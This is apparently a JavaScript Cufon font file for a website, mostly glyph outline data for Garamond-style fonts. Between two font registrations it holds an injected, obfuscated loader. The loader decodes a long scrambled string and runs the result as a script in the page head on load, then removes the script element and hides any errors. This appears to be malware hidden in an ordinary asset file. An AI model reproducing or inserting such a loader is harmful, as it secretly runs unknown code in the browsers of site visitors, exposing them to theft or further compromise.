,-243v282,0,487,118,602,289v183,273,128,621,-79,848v-182,200,-589,270,-877,140v-140,-63,-215,-150,-287,-274v-17,-31,-36,-86,-57,-166xm796,-78v288,-9,407,-220,405,-537v0,-64,-7,-199,-26,-277v-49,-200,-175,-336,-404,-336v-199,0,-294,151,-336,312v-36,137,-30,391,10,511v54,162,55,170,150,258v37,34,128,71,201,69xm590,-1716r273,0v16,41,34,103,47,143v31,90,49,149,56,178r-79,-3","w":1621},{"d":"326,416v-63,87,-230,67,-230,-59v0,-29,17,-61,50,-101v37,-45,113,-82,188,-109v8,-92,29,-231,44,-293r-238,-3r-42,3v13,-43,19,-91,37,-130v91,-16,163,-15,260,-18v66,-336,148,-691,341,-895v99,-105,284,-170,455,-121v62,18,133,75,131,149v-2,76,-98,139,-171,100v-28,-15,-106,-106,-110,-110v-33,-42,-79,-59,-125,-34v-19,10,-37,30,-50,59v-32,71,-80,301,-106,414r-46,198v-39,155,-60,203,-56,239v74,9,227,-3,300,17v-1,41,-20,93,-29,128r-220,4v-23,4,-78,7,-112,6r-124,251v131,-33,222,-2,296,62v50,43,85,75,102,96v63,44,70,71,135,75v50,3,79,-26,79,-76v1,-57,-75,-152,-65,-195v-2,-64,61,-128,127,-128v79,0,147,77,147,164v0,190,-215,362,-428,362v-133,0,-266,-64,-401,-192v-19,-17,-35,-30,-48,-38v-38,89,-70,146,-91,175","w":1387},{"d":"760,-89v-85,49,-158,92,-285,92v-188,0,-302,-103,-355,-216v-30,-65,-42,-137,-42,-215v0,-162,121,-336,280,-394v38,-14,116,-23,185,-23v73,0,142,25,209,75v3,-119,14,-356,-21,-412v-14,-38,-82,-24,-113,-42r0,-48v95,-9,234,-42,336,-64v3,0,9,1,16,2v15,103,13,310,11,450r-4,273r2,119v-5,83,3,190,1,280v0,24,1,53,2,86v10,12,91,14,127,21v8,23,6,25,-2,49v-88,19,-235,34,-281,63v-29,19,-32,18,-64,14v2,-40,0,-98,-2,-110xm323,-460v-5,211,93,351,285,351v60,0,105,-27,150,-55v1,-22,1,-36,1,-41v0,-211,-3,-339,-9,-382v-12,-106,-86,-180,-197,-181v-167,-1,-226,156,-230,308","w":1131,"k":{"w":-20}},{"d":"252,-1070v4,-73,1,-147,-1,-221v22,-2,240,-3,446,-3v-2,25,8,70,-11,75v-119,30,-185,47,-199,57v-10,7,-14,35,-13,64r8,469v0,16,-8,79,-7,189r5,448r-4,246r4,84v15,11,166,36,210,47v4,39,6,46,1,77r-436,-2r-2,-310r3,-110r-3,-157","w":747},{"d":"301,-1060v-65,1,-129,-69,-129,-139v0,-71,53,-123,125,-123v71,0,137,54,137,119v0,79,-56,141,-133,143xm509,-6v-123,-6,-334,-11,-477,0r-2,-65v49,-10,122,-4,148,-35v27,-136,11,-337,11,-504v0,-21,-2,-42,-6,-64v-30,-31,-67,-36,-141,-42r0,-56v138,-11,214,-45,296,-128r67,0v3,83,6,190,4,322r-7,408v0,28,1,53,4,76v23,11,106,20,144,32r-1,55v-18,1,-31,1,-40,1","w":576,"k":{"v":35}},{"d":"142,-220v-79,-148,-106,-394,-72,-601v31,-191,71,-285,162,-385v65,-71,126,-117,259,-117v62,0,123,20,181,65v133,103,226,325,226,590v0,238,-68,464,-180,583v-47,50,-132,107,-207,107v-149,0,-201,-23,-275,-99v-36,-37,-64,-86,-94,-143xm642,-718v-7,-218,31,-501,-170,-517v-79,11,-121,72,-142,170v-18,87,-14,405,-14,548v0,147,8,245,14,297v13,111,118,202,214,131v61,-45,76,-117,86,-238v16,-191,17,-240,12,-391"},{"d":"504,-1135v-64,49,-140,125,-220,190r-79,-3r193,-349r214,0r188,353r-78,1xm892,-167v-104,112,-206,181,-394,184v-227,3,-338,-113,-401,-274v-38,-98,-32,-183,-11,-279v29,-131,94,-177,166,-241v112,-100,351,-105,470,-24v100,68,163,145,169,304r-111,-2v-22,2,-215,-13,-282,-13r-194,1v-10,174,64,314,194,361r58,19v152,1,185,-24,276,-83v24,17,44,33,60,47xm537,-574v34,1,93,-9,130,-5v-1,-116,-66,-215,-176,-215v-103,0,-179,104,-182,219"},{"d":"7,-50v23,-23,129,-22,137,-40v13,-17,20,-53,20,-106r-4,-822v0,-55,-4,-95,-13,-121v-35,-24,-76,-18,-120,-26v-3,-27,-5,-34,-1,-55v97,-9,235,-61,294,-105v20,-1,31,-2,54,0r5,560r1,613v2,56,9,73,65,77v14,1,42,5,83,10v6,27,6,34,3,62r-79,-4v-118,-6,-230,-11,-368,3r-73,0","w":533,"k":{"y":-20,"w":-20}},{"d":"59,-678v0,-406,304,-709,709,-709v405,0,710,302,710,709v0,407,-302,709,-710,709v-407,0,-709,-302,-709,-709xm1388,-678v0,-355,-265,-620,-620,-620v-354,0,-620,266,-620,620v0,356,265,620,620,620v356,0,620,-264,620,-620xm1019,-1055v29,-1,43,-20,46,-51r38,0r0,264r-38,0v-21,-122,-113,-216,-246,-216v-176,0,-258,150,-258,364v0,135,24,231,73,288v125,144,328,96,441,-52r0,70v-81,85,-187,127,-318,127v-243,0,-421,-168,-421,-407v0,-249,192,-439,440,-439v65,0,170,34,243,52","w":1536},{"d":"463,-1320v283,0,450,240,443,564v-8,358,-219,644,-502,746v-95,34,-141,45,-223,38v-18,-20,-22,-45,-6,-64v63,-33,182,-82,237,-124v124,-94,210,-265,222,-458v3,-42,15,-140,15,-210v0,-170,-22,-286,-62,-350v-56,-89,-161,-93,-225,-10v-66,85,-69,274,-49,415v7,51,35,119,70,140v45,27,94,22,145,8v42,1,42,87,2,94v-51,22,-141,36,-198,20v-122,-34,-152,-68,-206,-137v-45,-57,-64,-154,-64,-248v0,-245,157,-424,401,-424"},{"d":"90,-1302v158,0,355,33,507,8v25,7,8,46,12,73v-52,17,-103,22,-167,33v-6,2,-7,9,-8,17v64,119,213,332,304,482v13,21,25,38,34,49r104,-146v34,-43,89,-111,137,-197r85,-151v17,-29,25,-32,17,-60v-25,-23,-92,-14,-138,-29v-1,-9,-3,-33,-6,-74r205,11v64,11,139,-4,202,-8r-1,75v-51,12,-108,25,-128,41v-29,24,-65,80,-121,164r-130,195v-92,131,-132,171,-166,252r-4,196r4,256v14,21,30,15,75,21v64,9,100,11,107,17v16,14,4,42,5,72r-115,-2v-157,-17,-346,-17,-495,2r-69,-1r0,-65v68,-17,147,-23,207,-48r-3,-353v11,-49,-73,-149,-101,-191r-196,-298v-62,-96,-71,-127,-154,-230v-42,-33,-38,-21,-126,-43v-10,-19,-2,-33,-2,-60v18,-5,60,-8,125,-8xm566,-1395v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1","w":1344}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-497-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("UN+faRpO@QrSU?.;VR*l>N>r7spf+RrS7sMl@QCH+!4)&gO0&f5fk3ZR+*5fk3Z:k=L:7=q]kNMj`}:TV1W]+jVTV1W]+jMTV1W]&1MTV1W]+N+TV1W]+jCk7=q]kNqf7=q]kNC.7*5TV1W]+RML&.5fk3Z.+3wTV1W]+1VTV1W]&s*TV1W]&sMTV1W]&1}f7=q]kN&f7=q]kNkf(?pTV1W]&R*TV1W]&g:TV1W]+1.TV1W]&1CH@WZ?3}*N=>MU{kpiI-Cu1q!Q7&+@aTV(`o:0jB.RHEwY|)LSv]5lgOfs8Dbt;4rm9*5fk3Zjk*5fk3Z.p*5fk3ZBk=ffa8VTV1W]&j!TV1W]+Nk)7=q]kN-O7=q]kN>b7=q]kN+j7=q]kN-5C*5fk3ZBp.5fk3Z:p.5fk3ZRi!5fk3Z:&QLTV1W]+3.TV1W]&R!TV1W]+3VTV1W]+j:TV1W]&1!TV1W]&jCt7=q]kNMB7=q]kN&]7=q]kN}D7=q]kNpj7=q]kN>8i*.TV1W]&j:TV1W]&1VTV1W]+j+TV1W]&jZTV1W]&j&E7=q]kNkO7=q]kN!.7=q]kNk87=q]kNqs7=q]kNC:1f5fk3ZR+!5fk3Zjp.5fk3Z.&.ZTV1W]&Q+TV1W]+1}r7=q]kNpR7=q]kN+Ru.5fk3Z:&grTV1W]&sCm7=q]kNC0ifTY7=q]kNqDQB+TV1W]&g.TV1W]&gk.I.5fk3k8+!5fk3Z0k0LT>.5fk3ZBi*5fk3Z0+jV=7=q]kN>gMs!uU!5fk3ZBkfCMI?ZTV1W]&RMWC7+S{R+?-qk:p0O5kfrTV1W]+j*{Tf5fk3ZR&1MQT!f]@.5fk3Z:&.5fk3Z.&lCO7?rlqsZTV1W]&j*b7=q]kN*.7=q]kN*B7=q]kNq]7=q]kNqgp*5fk3Z.k.5fk3ZRkObTV1W]+3!C1!:TV1W]&s!!7=q]kNkl7=q]kN!R7=q]kNk5M.bTV1W]+3MTV1W]&1pBQsB]7=q]kN!:a*5fk3Z:i1.TV1W]+N-0{Hp]aN.OU?>0Uu5wI1W)T3f0{HW)a3f]{R5.aRVO@?5HIQ>S+0bHa=.]@=kr(8O;@Q&E&0bv@gOv70o9iHV8Vf]SU14EIgESUf]S&R5f+Rrl&s!T{R*O`?D|7?bHas!gTs5T{Rpva7]SUf]S+8V:aRCE&7!g7?bjasOwM?rw{HC.T8-EaNrj&7CwasDS@NrgVNb:aQqwUQ+vT0o;@15)il)|@u.HQspa@!fVI7Za@!frUuow")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":960,"face":{"font-family":"Garamond bold","font-weight":700,"font-stretch":"normal","units-per-em":"2048","panose-1":"2 2 8 4 3 3 7 1 8 3","ascent":"1638","descent":"-410","x-height":"17","bbox":"-119 -1733 1860 512.729","underline-thickness":"102","underline-position":"-103","unicode-range":"U+0020-U+00FF"}}));Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"375,-52v34,40,107,32,181,32v241,0,484,2,633,-116v49,-38,89,-94,119,-170v12,0,21,-1,31,2v-7,33,-36,136,-87,311r-627,10r-408,-2v-73,4,-148,-2,-222,1r-1,-31r93,-4v53,-6,80,-10,136,-24v3,-11,6,-26,9,-43v36,-177,58,-304,72,-379r62,-339v2,-8,6,-41,15,-99v16,-102,44,-181,48,-301v-10,-57,-40,-40,-132,-52r-64,-4v1,-12,3,-24,7,-37r354,1r704,-8r82,3v-3,29,-28,183,-47,222v-10,-1,-18,-6,-25,-13v-19,-77,-5,-111,-26,-163v-163,-22,-340,-2,-522,-2v-68,0,-132,-4,-180,24r-87,501v-1,9,-2,19,-3,30v24,-8,591,-35,582,-41v26,-7,46,-17,60,-31v14,-14,40,-61,77,-141r38,-5r-88,431v-12,-1,-24,-2,-35,-2v-1,-28,9,-47,7,-94v-3,-93,-18,-108,-113,-108v-47,0,-102,9,-167,14v-58,4,-193,8,-280,16r-87,8r-113,547v-3,25,-6,35,4,56xm697,-1627v-41,-36,-39,-103,21,-105v79,14,84,43,150,124v68,84,110,148,134,185r-18,0v-172,-116,-266,-185,-287,-204","w":1408},{"d":"450,-794v99,-51,197,25,197,129v0,72,-48,159,-90,187v-57,37,-71,57,-158,80v-41,11,-93,24,-157,37v-22,61,-33,122,-33,184v0,82,48,167,128,128v82,-39,131,-116,166,-207v15,0,26,0,41,2v-20,75,-69,148,-148,220v-49,45,-100,67,-153,67v-178,0,-151,-313,-91,-449v40,-91,84,-173,144,-244v80,-95,76,-94,154,-134xm575,-711v2,-34,-25,-67,-55,-67v-18,0,-38,11,-64,31v-63,48,-171,241,-197,336v148,-20,310,-120,316,-300xm403,-1014v-44,0,-81,-38,-81,-83v0,-42,38,-80,81,-80v44,0,81,37,81,81v0,44,-38,82,-81,82xm656,-1097v0,-42,38,-79,81,-79v44,0,82,38,82,81v0,44,-38,82,-82,82v-45,0,-81,-38,-81,-84","w":597},{"d":"792,-674v8,-24,1,-58,-22,-61v-74,20,-100,55,-176,131v-187,190,-240,277,-345,431v-28,41,-83,166,-125,195v-29,3,-47,6,-70,-1v-8,-21,-2,-31,11,-55v4,-7,60,-111,164,-314r178,-349v2,-5,3,-12,4,-21v-26,-10,-37,1,-70,25v-56,40,-98,89,-139,140v-13,-1,-25,-3,-38,-5v74,-113,164,-192,267,-242v39,-19,101,-12,101,30v0,23,-39,111,-117,264v-22,44,-36,74,-43,90v88,-92,185,-219,305,-323v41,-35,113,-73,175,-73v30,0,61,18,60,53v13,64,-112,289,-167,403r102,-121v88,-90,183,-215,285,-275v61,-36,108,-55,143,-55v46,0,65,53,52,103v-29,113,-174,333,-244,460v-42,76,-106,117,-114,177v0,3,2,7,7,10v67,-33,119,-78,197,-147r31,8v-48,90,-224,224,-352,224v-14,0,-26,-5,-36,-16v3,-37,8,-31,36,-76r166,-269v121,-201,157,-246,198,-378v-3,-32,-33,-30,-60,-14v-119,72,-301,294,-367,370v-87,100,-157,208,-217,317v-14,26,-30,47,-47,63v-31,5,-71,4,-96,-3v2,-12,11,-32,28,-59v48,-74,256,-455,293,-535v22,-46,36,-80,42,-102","w":1280,"k":{"y":-25}},{"d":"508,-613v-36,-1,-78,-55,-78,-98v0,-66,44,-127,101,-127v54,0,89,50,86,114v-3,55,-50,113,-109,111xm241,487v-179,0,-297,-180,-235,-361v75,-215,380,-286,494,-455v22,-34,27,-64,27,-109v-12,-47,-57,-68,-101,-70v-71,11,-102,62,-135,140v-12,-1,-23,-5,-34,-11v13,-90,87,-180,182,-180v121,0,189,159,129,292v-55,122,-126,176,-254,271v-134,99,-179,98,-234,219v-76,168,185,295,316,165v26,-25,46,-63,61,-115v17,-2,34,-3,52,-3v-18,132,-118,217,-268,217","w":747},{"d":"258,-1310v155,10,285,-3,442,3r153,-1v113,7,227,-5,320,30v185,70,331,213,331,456v0,327,-215,550,-439,692v-115,73,-350,140,-529,138r-185,-2r-94,6v-10,1,-182,2,-220,-1r1,-35v182,-34,181,19,209,-131r72,-392r137,-676v-14,-45,-45,-34,-134,-42v-28,-2,-51,-3,-69,-8v-3,-15,-2,-20,5,-37xm382,-117v10,91,61,84,197,84v80,0,228,-42,297,-74v185,-85,336,-260,407,-453v67,-183,79,-313,-5,-464v-75,-136,-157,-198,-342,-222v-124,-16,-230,-27,-331,-9v-4,34,-30,152,-38,192r-128,664v-11,58,-63,227,-57,282","w":1493,"k":{"\u00c5":180,"\u00c4":180,"Y":102,"W":27,"V":102,"A":180,".":154,",":180}},{"d":"187,13r-171,5r0,-34v73,-22,183,-15,202,-72v85,-256,218,-707,218,-1023v0,-44,25,-108,-6,-134v-28,-24,-130,-11,-184,-23v2,-13,5,-28,9,-43r307,12r243,-12r0,35v-28,8,-165,19,-172,33v-9,7,-19,18,-24,35v-40,129,-152,686,-195,902v-31,157,-53,211,-41,252v22,18,140,24,183,33v0,15,12,35,-12,35r-180,3xm295,-1627v-41,-36,-39,-103,21,-105v79,14,84,43,150,124v68,84,110,148,134,185r-18,0v-172,-116,-266,-185,-287,-204","w":661},{"d":"450,-794v99,-51,197,25,197,129v0,72,-48,159,-90,187v-57,37,-71,57,-158,80v-41,11,-93,24,-157,37v-22,61,-33,122,-33,184v0,82,48,167,128,128v82,-39,131,-116,166,-207v15,0,26,0,41,2v-20,75,-69,148,-148,220v-49,45,-100,67,-153,67v-178,0,-151,-313,-91,-449v40,-91,84,-173,144,-244v80,-95,76,-94,154,-134xm575,-711v2,-34,-25,-67,-55,-67v-18,0,-38,11,-64,31v-63,48,-171,241,-197,336v148,-20,310,-120,316,-300xm688,-1243v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47","w":597},{"d":"561,-819v117,0,166,102,166,251v0,155,-47,292,-141,412v-94,120,-190,180,-291,180v-200,0,-210,-267,-142,-450v36,-97,78,-162,133,-230v60,-76,155,-163,275,-163xm651,-681v0,-49,-28,-91,-69,-91v-39,0,-79,25,-123,69v-107,106,-244,394,-252,590v-5,111,122,105,186,44v89,-85,258,-447,258,-612xm451,-1149v-41,-36,-39,-103,21,-105v79,14,84,43,150,124v68,84,110,148,134,185r-18,0v-172,-116,-266,-185,-287,-204","w":725},{"d":"138,19v-31,3,-57,-20,-60,-46v-11,-107,270,-557,284,-605v15,-47,57,-66,23,-108v-52,14,-112,58,-179,132r-54,10v56,-92,206,-209,321,-217v32,-2,49,30,39,63v-42,160,-230,458,-316,645v-5,11,-11,44,8,44v22,0,46,-12,71,-35v66,-59,110,-109,133,-148v12,0,25,1,39,3v-58,99,-169,250,-309,262xm359,-1014v-44,0,-81,-38,-81,-83v0,-42,38,-80,81,-80v44,0,81,37,81,81v0,44,-38,82,-81,82xm612,-1097v0,-42,38,-79,81,-79v44,0,82,38,82,81v0,44,-38,82,-82,82v-45,0,-81,-38,-81,-84","w":469},{"d":"439,-904v11,-13,50,-52,117,-115r270,-255r57,-1r20,373r-21,1r-76,-244r-336,240xm168,8v-34,21,-90,28,-90,-22v0,-67,29,-100,64,-170r171,-337r70,-149v16,-32,27,-36,12,-62v-22,9,-51,38,-93,77v-34,31,-78,76,-107,105r-32,-7v36,-59,176,-201,250,-241v48,-26,118,-34,118,21v0,28,-21,55,-32,91v-20,66,-277,522,-285,608v17,-3,41,-17,70,-42v115,-97,167,-152,244,-234v157,-168,203,-225,317,-463v36,-3,65,-9,82,13v-14,42,-40,111,-79,206r-186,464v-11,24,-19,46,-22,66r7,1v63,-36,119,-116,161,-168r32,5v-32,61,-84,129,-162,198v-58,50,-73,69,-133,52v-12,-13,-18,-25,-18,-36v0,-33,14,-82,41,-146r149,-349r-79,90v-170,195,-270,309,-470,429","w":875},{"d":"198,-55v42,25,139,20,188,37v-1,11,-3,22,-8,34r-185,-13r-277,14v-8,0,-17,-1,-26,-4v-2,-10,-3,-21,-3,-33v64,-20,163,0,212,-39v129,-103,241,-236,359,-349r133,-131r631,-609v41,-47,74,-84,98,-109v7,-7,25,-25,52,-55v22,-3,33,-2,59,0r-33,532r-36,469r-9,245v5,9,20,15,43,18v59,6,103,14,132,25v2,15,1,20,-4,37v-161,-30,-347,-2,-503,3v-10,0,-22,-1,-36,-4r2,-28r200,-32v31,-35,19,-58,35,-178v12,-92,14,-163,15,-212v1,-24,1,-42,2,-53v-8,-1,-27,-1,-58,-1r-578,17v-27,17,-53,51,-86,73v-35,41,-139,127,-191,183r-75,81v-20,18,-41,33,-55,57v1,7,2,16,2,25xm655,-532v168,26,410,-2,587,-13v17,-124,21,-261,31,-393r15,-187v-183,139,-357,332,-530,487v-39,35,-63,63,-103,106xm1651,-1722v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47","w":1557},{"d":"290,-1310v155,10,285,-3,442,3r153,-1v113,7,227,-5,320,30v185,70,331,213,331,456v0,327,-215,550,-439,692v-115,73,-350,140,-529,138r-185,-2r-94,6v-10,1,-182,2,-220,-1r1,-35v60,-11,153,-4,183,-40v30,-66,59,-265,69,-323v1,-11,16,-93,45,-246r-184,0r10,-46r184,0r59,-274v2,-8,38,-224,43,-229v10,-34,17,-51,-9,-68v-9,-13,-145,-12,-185,-23v-3,-15,-2,-20,5,-37xm414,-117v0,92,61,84,197,84v80,0,228,-42,297,-74v185,-85,336,-260,407,-453v67,-183,79,-313,-5,-464v-75,-136,-157,-198,-342,-222v-124,-16,-230,-27,-331,-9r-112,576r463,0r-9,46r-464,0v-35,183,-59,300,-72,351v-19,73,-29,128,-29,165","w":1557},{"d":"166,-678v0,-406,304,-709,709,-709v405,0,710,302,710,709v0,407,-302,709,-710,709v-407,0,-709,-302,-709,-709xm1523,-678v0,-371,-278,-648,-648,-648v-369,0,-647,277,-647,648v0,372,275,648,647,648v371,0,648,-276,648,-648xm575,-943v2,-113,-2,-127,-92,-135r0,-36r386,0v168,-5,297,81,297,224v0,131,-92,189,-222,222r209,298v43,52,51,80,121,88r0,33r-184,0r-294,-405r-76,0r0,309v13,55,40,62,118,63r0,33r-367,0r0,-33v96,-7,104,-22,104,-138r0,-523xm1005,-879v4,-138,-143,-231,-285,-175r0,357v165,8,281,-47,285,-182","w":1557},{"d":"808,-1076v63,0,84,-54,94,-131r15,0v14,114,-65,201,-163,205v-101,4,-203,-126,-297,-126v-61,0,-85,52,-91,126r-18,0v-6,-117,61,-198,162,-204v92,-5,224,130,298,130xm561,-819v117,0,166,102,166,251v0,155,-47,292,-141,412v-94,120,-190,180,-291,180v-200,0,-210,-267,-142,-450v36,-97,78,-162,133,-230v60,-76,155,-163,275,-163xm651,-681v0,-49,-28,-91,-69,-91v-39,0,-79,25,-123,69v-107,106,-244,394,-252,590v-5,111,122,105,186,44v89,-85,258,-447,258,-612","w":725},{"d":"311,-141v-117,-126,-194,-423,-103,-649v29,-72,64,-147,108,-224v15,-26,62,-85,149,-167v45,-42,189,-126,322,-138v182,-16,296,5,420,121r114,-135r35,31r-117,137v129,136,183,392,105,634v-53,163,-155,297,-272,401v-104,94,-233,158,-404,158v-143,0,-230,-49,-324,-137r-121,142r-35,-30xm1142,-1122v-53,-87,-148,-162,-274,-162v-160,0,-284,92,-362,192v-82,106,-190,394,-190,582v0,112,19,210,57,295xm1166,-1078r-768,904v77,109,177,181,329,158v156,-24,182,-62,264,-156v90,-103,160,-277,199,-411v37,-128,43,-249,14,-372v-15,-64,-29,-104,-38,-123","w":1387},{"d":"706,-1242v-83,3,-136,79,-132,179v3,116,8,109,36,269v40,230,62,402,62,519v1,261,-96,500,-231,632v-110,107,-244,151,-372,66v-56,-37,-78,-94,-78,-156v-1,-57,24,-113,76,-113v55,0,73,48,75,118v3,82,14,118,84,118v98,0,142,-72,140,-186v-5,-213,-109,-566,-105,-791v5,-311,113,-557,300,-680v55,-36,110,-52,163,-52v136,0,227,84,227,213v0,78,-69,131,-123,78v-27,-26,-35,-166,-64,-190v-17,-14,-35,-24,-58,-24xm352,-715v0,287,139,762,59,1019v95,-91,167,-287,167,-482v0,-137,-73,-637,-73,-752v0,-86,8,-162,25,-228v-99,82,-178,254,-178,443","w":896},{"d":"449,-1014v-44,0,-81,-38,-81,-83v0,-42,38,-80,81,-80v44,0,81,37,81,81v0,44,-38,82,-81,82xm702,-1097v0,-42,38,-79,81,-79v44,0,82,38,82,81v0,44,-38,82,-82,82v-45,0,-81,-38,-81,-84","w":683},{"d":"200,24v-55,-2,-33,-29,-2,-64v46,-51,113,-182,183,-289r518,-794r-325,-3v-121,-8,-176,40,-260,6v-15,-6,-8,-21,-4,-33r35,-100v173,3,354,4,541,4v57,0,92,-8,131,-8v21,0,43,4,45,22v0,7,-46,75,-133,205r-682,1022v-17,21,-32,32,-47,32","w":960},{"d":"733,-1243v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47","w":683},{"d":"138,19v-31,3,-57,-20,-60,-46v-11,-107,270,-557,284,-605v15,-47,57,-66,23,-108v-52,14,-112,58,-179,132r-54,10v56,-92,206,-209,321,-217v32,-2,49,30,39,63v-42,160,-230,458,-316,645v-5,11,-11,44,8,44v22,0,46,-12,71,-35v66,-59,110,-109,133,-148v12,0,25,1,39,3v-58,99,-169,250,-309,262xm314,-1149v-41,-36,-39,-103,21,-105v79,14,84,43,150,124v68,84,110,148,134,185r-18,0v-172,-116,-266,-185,-287,-204","w":469},{"d":"-214,471r12,-39r338,-1r468,-1670r-337,1r11,-42r383,-1r-489,1751","w":619},{"d":"289,-904v11,-13,50,-52,117,-115r270,-255r57,-1r20,373r-21,1r-76,-244r-336,240xm450,-794v99,-51,197,25,197,129v0,72,-48,159,-90,187v-57,37,-71,57,-158,80v-41,11,-93,24,-157,37v-22,61,-33,122,-33,184v0,82,48,167,128,128v82,-39,131,-116,166,-207v15,0,26,0,41,2v-20,75,-69,148,-148,220v-49,45,-100,67,-153,67v-178,0,-151,-313,-91,-449v40,-91,84,-173,144,-244v80,-95,76,-94,154,-134xm575,-711v2,-34,-25,-67,-55,-67v-18,0,-38,11,-64,31v-63,48,-171,241,-197,336v148,-20,310,-120,316,-300","w":597},{"d":"235,-904v11,-13,50,-52,117,-115r270,-255r57,-1r20,373r-21,1r-76,-244r-336,240xm138,19v-31,3,-57,-20,-60,-46v-11,-107,270,-557,284,-605v15,-47,57,-66,23,-108v-52,14,-112,58,-179,132r-54,10v56,-92,206,-209,321,-217v32,-2,49,30,39,63v-42,160,-230,458,-316,645v-5,11,-11,44,8,44v22,0,46,-12,71,-35v66,-59,110,-109,133,-148v12,0,25,1,39,3v-58,99,-169,250,-309,262","w":469},{"d":"219,-912r1072,0r0,88r-1072,0r0,-88xm219,-449r1072,0r0,89r-1072,0r0,-89","w":1365},{"d":"432,-39v-204,-123,-335,-452,-224,-751v27,-72,64,-147,108,-224v15,-26,63,-85,150,-168v44,-42,189,-124,321,-137v220,-21,346,22,479,186v111,137,149,385,78,602v-53,163,-158,294,-272,401v-147,138,-432,216,-640,91xm316,-510v3,216,61,361,204,454v23,8,98,48,166,42v175,-19,222,-61,306,-158v89,-103,160,-277,198,-411v80,-282,4,-592,-202,-676v-195,-79,-391,46,-482,167v-80,107,-192,394,-190,582xm734,-1447v-44,0,-81,-38,-81,-83v0,-42,38,-80,81,-80v44,0,81,37,81,81v0,44,-38,82,-81,82xm987,-1530v0,-42,38,-79,81,-79v44,0,82,38,82,81v0,44,-38,82,-82,82v-45,0,-81,-38,-81,-84","w":1387,"k":{"Y":154,"X":51,"W":78,"V":154,"A":78}},{"d":"113,482v-22,0,-50,-18,-48,-45v9,-106,135,-149,195,-204r70,-263v3,-18,12,-56,27,-113v-91,-8,-180,-12,-267,-12v-6,-15,-7,-22,-4,-35v82,-9,229,-2,283,-8r57,-243v15,-53,43,-155,91,-301v43,-131,76,-238,161,-352v60,-80,118,-137,176,-168v82,-45,354,-67,362,51v4,52,-44,92,-91,65v-43,-24,-106,-111,-181,-106v-70,5,-79,15,-120,60v-96,103,-154,343,-196,501r-101,384v-9,29,-17,62,-23,101v141,3,228,7,260,12v-2,17,-11,33,-18,51r-264,6v-55,140,-71,175,-169,358v84,-38,198,-65,274,-16v98,63,165,107,270,192v89,43,186,-76,191,-151v2,-32,-45,-110,-45,-133v0,-30,24,-65,59,-65v59,0,87,52,87,94v0,14,-1,45,-15,90v-33,107,-107,163,-185,206v-62,34,-158,53,-223,22v-115,-55,-216,-243,-380,-209v-11,2,-23,7,-35,15v-60,44,-60,136,-125,182v-31,22,-54,34,-73,34","w":1280},{"d":"416,-904v11,-13,50,-52,117,-115r270,-255r57,-1r20,373r-21,1r-76,-244r-336,240xm521,-700v89,-40,157,-55,238,-24v14,-24,22,-56,37,-66v35,-3,49,-6,74,4v8,29,-11,56,-23,88r-66,179v-28,81,-51,145,-73,193v-36,79,-66,197,-101,263v0,4,4,9,11,16v76,-42,159,-133,192,-171v8,7,15,14,22,21v-36,50,-152,172,-213,201v-28,13,-53,21,-77,21v-52,0,-57,-38,-36,-88r62,-152v7,-18,20,-49,41,-94v-70,82,-146,173,-233,249v-30,26,-244,152,-287,35v-50,-134,64,-335,114,-404v89,-124,193,-215,318,-271xm193,-138v0,58,28,86,90,70v59,-16,47,-22,120,-72v144,-149,126,-118,217,-248v19,-27,91,-172,91,-233v0,-34,-24,-70,-72,-68v-87,4,-132,45,-182,89v-112,99,-264,290,-264,462"},{"d":"285,12r406,-415v-8,-34,-88,-265,-142,-425r30,4r228,418r-488,419xm-26,-7r343,-399r-50,-403r25,0r142,401r-423,401r-37,0","w":789},{"d":"521,-700v89,-40,157,-55,238,-24v14,-24,22,-56,37,-66v35,-3,49,-6,74,4v8,29,-11,56,-23,88r-66,179v-28,81,-51,145,-73,193v-36,79,-66,197,-101,263v0,4,4,9,11,16v76,-42,159,-133,192,-171v8,7,15,14,22,21v-36,50,-152,172,-213,201v-28,13,-53,21,-77,21v-52,0,-57,-38,-36,-88r62,-152v7,-18,20,-49,41,-94v-70,82,-146,173,-233,249v-30,26,-244,152,-287,35v-50,-134,64,-335,114,-404v89,-124,193,-215,318,-271xm193,-138v0,58,28,86,90,70v59,-16,47,-22,120,-72v144,-149,126,-118,217,-248v19,-27,91,-172,91,-233v0,-34,-24,-70,-72,-68v-87,4,-132,45,-182,89v-112,99,-264,290,-264,462xm608,-1149v-41,-36,-39,-103,21,-105v79,14,84,43,150,124v68,84,110,148,134,185r-18,0v-172,-116,-266,-185,-287,-204"},{"d":"269,-1060r61,-63r426,427r426,-427r61,63r-425,427r421,421r-62,62r-421,-422r-424,422r-62,-62r423,-421","w":1365},{"d":"359,-904v11,-13,50,-52,117,-115r270,-255r57,-1r20,373r-21,1r-76,-244r-336,240xm561,-819v117,0,166,102,166,251v0,155,-47,292,-141,412v-94,120,-190,180,-291,180v-200,0,-210,-267,-142,-450v36,-97,78,-162,133,-230v60,-76,155,-163,275,-163xm651,-681v0,-49,-28,-91,-69,-91v-39,0,-79,25,-123,69v-107,106,-244,394,-252,590v-5,111,122,105,186,44v89,-85,258,-447,258,-612","w":725},{"d":"678,-823v58,0,122,38,160,64v21,-26,42,-48,63,-66v11,0,14,0,22,6v-2,55,-54,158,-52,168r-129,394v-39,103,-66,195,-94,274r-83,237r-53,188v0,11,5,20,16,27r80,7v20,1,39,13,30,37v-74,6,-244,-4,-232,-2r-216,6v-9,0,-18,-5,-28,-14v0,-29,43,-22,70,-25v102,-10,138,-14,168,-80v10,-24,31,-97,74,-